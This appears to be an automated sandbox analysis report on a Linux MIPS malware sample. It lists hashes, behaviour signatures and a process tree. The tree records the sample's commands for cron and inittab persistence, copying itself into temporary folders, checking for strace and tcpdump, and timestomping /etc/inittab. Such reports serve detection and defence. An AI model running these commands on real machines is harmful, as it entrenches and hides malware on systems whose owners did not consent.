Analysis
-
max time kernel
0s -
max time network
121s -
platform
linux_mipsel -
resource
debian9-mipsel-en-20211208 -
submitted
14-03-2022 01:55
Static task
static1
Behavioral task
behavioral1
Sample
97717ad2ff60ac257a5f66634fe06544
Resource
debian9-mipsel-en-20211208
General
-
Target
97717ad2ff60ac257a5f66634fe06544
-
Size
156KB
-
MD5
97717ad2ff60ac257a5f66634fe06544
-
SHA1
9845039ea2423177944fb7666595002891ca28e3
-
SHA256
95d1fca8bea30d9629fdf05e6ba0fc6195eb0a86f99ea021b17cb8823db9d78b
-
SHA512
1535c1402cce5805feff0373ad74de39d5fd5012ff4c400a1e82074fa9967cdc50e58876ad9f9a2352fcb340e77735abd2f5f3f5fa5dcde254f6abd326577f6e
Malware Config
Signatures
-
Writes file to system bin folder 1 TTPs 3 IoCs
Processes:
description ioc /bin/crontab /bin/crontab /bin/nvram /bin/nvram /bin/uname /bin/uname -
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
Processes:
description ioc /etc/hosts /etc/hosts -
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Modifies rc script 1 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
Processes:
97717ad2ff60ac257a5f66634fe06544description ioc process /etc/rc.local /etc/rc.local 97717ad2ff60ac257a5f66634fe06544 -
Write file to user bin folder 1 TTPs 2 IoCs
Processes:
description ioc /usr/bin/crontab /usr/bin/crontab /usr/sbin/nvram /usr/sbin/nvram -
Reads runtime system information 20 IoCs
Reads data from /proc virtual filesystem.
Processes:
crontabcpcrontabcrontabcrontabcrontabcpcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcpcrontabcrontabcpcrontabdescription ioc process /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems cp /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems cp /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems cp /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems crontab /proc/filesystems /proc/filesystems cp /proc/filesystems /proc/filesystems crontab -
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
Processes:
cpcp97717ad2ff60ac257a5f66634fe06544cpcpdescription ioc process /tmp/97717ad2ff60ac257a5f66634fe06544 /tmp/97717ad2ff60ac257a5f66634fe06544 cp /tmp/97717ad2ff60ac257a5f66634fe06544 /tmp/97717ad2ff60ac257a5f66634fe06544 cp /tmp/.bawtz /tmp/.bawtz 97717ad2ff60ac257a5f66634fe06544 /tmp/97717ad2ff60ac257a5f66634fe06544 /tmp/97717ad2ff60ac257a5f66634fe06544 cp /tmp/97717ad2ff60ac257a5f66634fe06544 /tmp/97717ad2ff60ac257a5f66634fe06544 cp
Processes
-
./97717ad2ff60ac257a5f66634fe06544./97717ad2ff60ac257a5f66634fe065441⤵
- Modifies rc script
- Writes file to tmp directory
PID:325
-
/bin/shsh -c "pidof -x strace > /dev/null"1⤵PID:326
-
/bin/pidofpidof -x strace2⤵PID:327
-
/bin/shsh -c "pidof -x tcpdump > /dev/null"1⤵PID:328
-
/bin/pidofpidof -x tcpdump2⤵PID:330
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/tmp/97717ad2ff60ac257a5f66634fe06544\" > /etc/inittab2"1⤵PID:336
-
/bin/catcat /etc/inittab2⤵PID:339
-
/bin/grepgrep -v /tmp/97717ad2ff60ac257a5f66634fe065442⤵PID:342
-
/bin/shsh -c "crontab -r"1⤵PID:337
-
/usr/bin/crontabcrontab -r2⤵
- Reads runtime system information
PID:340
-
/bin/shsh -c "crontab -l | grep /tmp/97717ad2ff60ac257a5f66634fe06544 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/97717ad2ff60ac257a5f66634fe06544 > /dev/null 2>&1 &\") | crontab -"1⤵PID:338
-
/usr/bin/crontabcrontab -l2⤵
- Reads runtime system information
PID:341 -
/bin/grepgrep /tmp/97717ad2ff60ac257a5f66634fe065442⤵PID:343
-
/bin/grepgrep -v "no cron"2⤵PID:344
-
/usr/bin/crontabcrontab -2⤵
- Reads runtime system information
PID:347
-
/bin/shsh -c "echo \"0:2345:respawn:/tmp/97717ad2ff60ac257a5f66634fe06544\" >> /etc/inittab2"1⤵PID:345
-
/usr/bin/crontabcrontab -l1⤵
- Reads runtime system information
PID:348
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:349
-
/bin/catcat /etc/inittab22⤵PID:350
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:351
-
/bin/rmrm -rf /etc/inittab22⤵PID:352
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:353
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:354
-
/bin/shsh -c "cp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /dev/shm/97717ad2ff60ac257a5f66634fe06544"1⤵PID:357
-
/bin/cpcp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /dev/shm/97717ad2ff60ac257a5f66634fe065442⤵
- Reads runtime system information
- Writes file to tmp directory
PID:360
-
/bin/shsh -c "/bin/uname -n"1⤵PID:358
-
/bin/uname/bin/uname -n2⤵PID:359
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/dev/shm/97717ad2ff60ac257a5f66634fe06544\" > /etc/inittab2"1⤵PID:362
-
/bin/catcat /etc/inittab2⤵PID:364
-
/bin/grepgrep -v /dev/shm/97717ad2ff60ac257a5f66634fe065442⤵PID:365
-
/bin/shsh -c "crontab -l | grep /dev/shm/97717ad2ff60ac257a5f66634fe06544 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/97717ad2ff60ac257a5f66634fe06544 > /dev/null 2>&1 &\") | crontab -"1⤵PID:363
-
/usr/bin/crontabcrontab -l2⤵
- Reads runtime system information
PID:366 -
/bin/grepgrep /dev/shm/97717ad2ff60ac257a5f66634fe065442⤵PID:367
-
/bin/grepgrep -v "no cron"2⤵PID:368
-
/usr/bin/crontabcrontab -2⤵
- Reads runtime system information
PID:371
-
/bin/shsh -c "echo \"0:2345:respawn:/dev/shm/97717ad2ff60ac257a5f66634fe06544\" >> /etc/inittab2"1⤵PID:369
-
/usr/bin/crontabcrontab -l1⤵
- Reads runtime system information
PID:372
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:373
-
/bin/catcat /etc/inittab22⤵PID:374
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:375
-
/bin/rmrm -rf /etc/inittab22⤵PID:376
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:377
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:378
-
/bin/shsh -c "cp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /var/tmp/97717ad2ff60ac257a5f66634fe06544"1⤵PID:379
-
/bin/cpcp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /var/tmp/97717ad2ff60ac257a5f66634fe065442⤵
- Reads runtime system information
- Writes file to tmp directory
PID:380
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/tmp/97717ad2ff60ac257a5f66634fe06544\" > /etc/inittab2"1⤵PID:382
-
/bin/grepgrep -v /var/tmp/97717ad2ff60ac257a5f66634fe065442⤵PID:386
-
/bin/catcat /etc/inittab2⤵PID:384
-
/bin/shsh -c "crontab -l | grep /var/tmp/97717ad2ff60ac257a5f66634fe06544 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/97717ad2ff60ac257a5f66634fe06544 > /dev/null 2>&1 &\") | crontab -"1⤵PID:383
-
/bin/grepgrep -v "no cron"2⤵PID:388
-
/usr/bin/crontabcrontab -l2⤵
- Reads runtime system information
PID:385 -
/bin/grepgrep /var/tmp/97717ad2ff60ac257a5f66634fe065442⤵PID:387
-
/usr/bin/crontabcrontab -2⤵
- Reads runtime system information
PID:391
-
/bin/shsh -c "echo \"0:2345:respawn:/var/tmp/97717ad2ff60ac257a5f66634fe06544\" >> /etc/inittab2"1⤵PID:389
-
/usr/bin/crontabcrontab -l1⤵
- Reads runtime system information
PID:392
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:393
-
/bin/catcat /etc/inittab22⤵PID:394
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:395
-
/bin/rmrm -rf /etc/inittab22⤵PID:396
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:397
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:398
-
/bin/shsh -c "cp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /var/lock/97717ad2ff60ac257a5f66634fe06544"1⤵PID:399
-
/bin/cpcp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /var/lock/97717ad2ff60ac257a5f66634fe065442⤵
- Reads runtime system information
- Writes file to tmp directory
PID:400
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/lock/97717ad2ff60ac257a5f66634fe06544\" > /etc/inittab2"1⤵PID:402
-
/bin/grepgrep -v /var/lock/97717ad2ff60ac257a5f66634fe065442⤵PID:406
-
/bin/catcat /etc/inittab2⤵PID:404
-
/bin/shsh -c "crontab -l | grep /var/lock/97717ad2ff60ac257a5f66634fe06544 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/97717ad2ff60ac257a5f66634fe06544 > /dev/null 2>&1 &\") | crontab -"1⤵PID:403
-
/bin/grepgrep -v "no cron"2⤵PID:408
-
/bin/grepgrep /var/lock/97717ad2ff60ac257a5f66634fe065442⤵PID:407
-
/usr/bin/crontabcrontab -l2⤵
- Reads runtime system information
PID:405 -
/usr/bin/crontabcrontab -2⤵
- Reads runtime system information
PID:411
-
/bin/shsh -c "echo \"0:2345:respawn:/var/lock/97717ad2ff60ac257a5f66634fe06544\" >> /etc/inittab2"1⤵PID:409
-
/usr/bin/crontabcrontab -l1⤵
- Reads runtime system information
PID:412
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:413
-
/bin/catcat /etc/inittab22⤵PID:414
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:415
-
/bin/rmrm -rf /etc/inittab22⤵PID:416
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:417
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:418
-
/bin/shsh -c "cp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /var/run/97717ad2ff60ac257a5f66634fe06544"1⤵PID:419
-
/bin/cpcp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /var/run/97717ad2ff60ac257a5f66634fe065442⤵
- Reads runtime system information
- Writes file to tmp directory
PID:420
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/run/97717ad2ff60ac257a5f66634fe06544\" > /etc/inittab2"1⤵PID:422
-
/bin/catcat /etc/inittab2⤵PID:424
-
/bin/grepgrep -v /var/run/97717ad2ff60ac257a5f66634fe065442⤵PID:425
-
/bin/shsh -c "crontab -l | grep /var/run/97717ad2ff60ac257a5f66634fe06544 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/97717ad2ff60ac257a5f66634fe06544 > /dev/null 2>&1 &\") | crontab -"1⤵PID:423
-
/usr/bin/crontabcrontab -l2⤵
- Reads runtime system information
PID:426 -
/bin/grepgrep /var/run/97717ad2ff60ac257a5f66634fe065442⤵PID:427
-
/bin/grepgrep -v "no cron"2⤵PID:428
-
/usr/bin/crontabcrontab -2⤵
- Reads runtime system information
PID:432
-
/bin/shsh -c "echo \"0:2345:respawn:/var/run/97717ad2ff60ac257a5f66634fe06544\" >> /etc/inittab2"1⤵PID:429
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:430
-
/bin/catcat /etc/inittab22⤵PID:434
-
/usr/bin/crontabcrontab -l1⤵
- Reads runtime system information
PID:433
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:435
-
/bin/rmrm -rf /etc/inittab22⤵PID:436
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:437
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:438